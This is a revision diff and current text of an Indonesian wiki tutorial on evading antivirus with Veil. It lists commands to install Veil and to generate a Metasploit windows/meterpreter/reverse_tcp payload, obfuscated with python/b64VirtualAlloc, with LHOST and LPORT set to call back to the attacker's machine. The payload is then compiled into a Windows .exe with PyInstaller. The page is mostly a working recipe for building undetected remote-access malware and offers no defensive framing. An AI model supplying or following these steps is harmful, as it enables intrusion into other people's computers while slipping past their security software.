Difference between revisions of "ByPass Antivirus Dengan Veil"
Adinugroho (talk | contribs) |
Adinugroho (talk | contribs) |
||
(2 intermediate revisions by the same user not shown) | |||
Line 12: | Line 12: | ||
===Penggunaan=== | ===Penggunaan=== | ||
Setelah instalasi, jalankan veilnya | Setelah instalasi, jalankan veilnya | ||
− | + | ./Veil | |
Ada 18 payload yang sudah siap digunakan. Untuk melihat daftar payloadnya kita gunakan perintah "use" | Ada 18 payload yang sudah siap digunakan. Untuk melihat daftar payloadnya kita gunakan perintah "use" | ||
− | + | use | |
Sebagai contoh kita pilih payload python/b64VirtualAlloc dengan mengetik angka 18 | Sebagai contoh kita pilih payload python/b64VirtualAlloc dengan mengetik angka 18 | ||
− | + | 18 | |
Selanjutnya kita ketik perintah "generate" untuk menggenerate payloadnya | Selanjutnya kita ketik perintah "generate" untuk menggenerate payloadnya | ||
− | + | generate | |
Setelah itu kita pilih msfvenom dengan mengetik angka "1" | Setelah itu kita pilih msfvenom dengan mengetik angka "1" | ||
− | + | 1 | |
Lalu kita berikan detail payloadnya misal | Lalu kita berikan detail payloadnya misal | ||
− | + | Enter metasploit payload: “windows/meterpreter/reverse_tcp“ | |
− | + | Enter value for ‘LHOST’, [tab] for local IP: “192.168.0.111" | |
− | + | Enter value for ‘LPORT’: “443“ | |
Setelah payload digenerate kita beri nama payloadnya misalkan "bypass" | Setelah payload digenerate kita beri nama payloadnya misalkan "bypass" | ||
Line 38: | Line 38: | ||
==Pranala Menarik== | ==Pranala Menarik== | ||
− | * [[Linux | + | * [[Linux Howto]] |
* [[Backtrack]] | * [[Backtrack]] |
Latest revision as of 11:45, 8 December 2013
ByPass Antivirus Dengan Veil
Pendahuluan
Payload yang diinject dengan menggunakan Metasploit biasanya terdeteksi oleh antivirus. Kita bisa membypass antivirusnya dengan menyamarkan payloadnya dengan Veil.
Instalasi Veil
wget https://github.com/ChrisTruncer/Veil/archive/master.zip unzip master.zip cd Veil-master/setup cd .. ./setup.sh
Penggunaan
Setelah instalasi, jalankan veilnya
./Veil
Ada 18 payload yang sudah siap digunakan. Untuk melihat daftar payloadnya kita gunakan perintah "use"
use
Sebagai contoh kita pilih payload python/b64VirtualAlloc dengan mengetik angka 18
18
Selanjutnya kita ketik perintah "generate" untuk menggenerate payloadnya
generate
Setelah itu kita pilih msfvenom dengan mengetik angka "1"
1
Lalu kita berikan detail payloadnya misal
Enter metasploit payload: “windows/meterpreter/reverse_tcp“ Enter value for ‘LHOST’, [tab] for local IP: “192.168.0.111" Enter value for ‘LPORT’: “443“
Setelah payload digenerate kita beri nama payloadnya misalkan "bypass"
Kita akan gunakan Pyinstaller untuk membuat file .exe. Ketik "1"
Hasilnya payload akan disimpan di /root/Veil-master/output/compiled/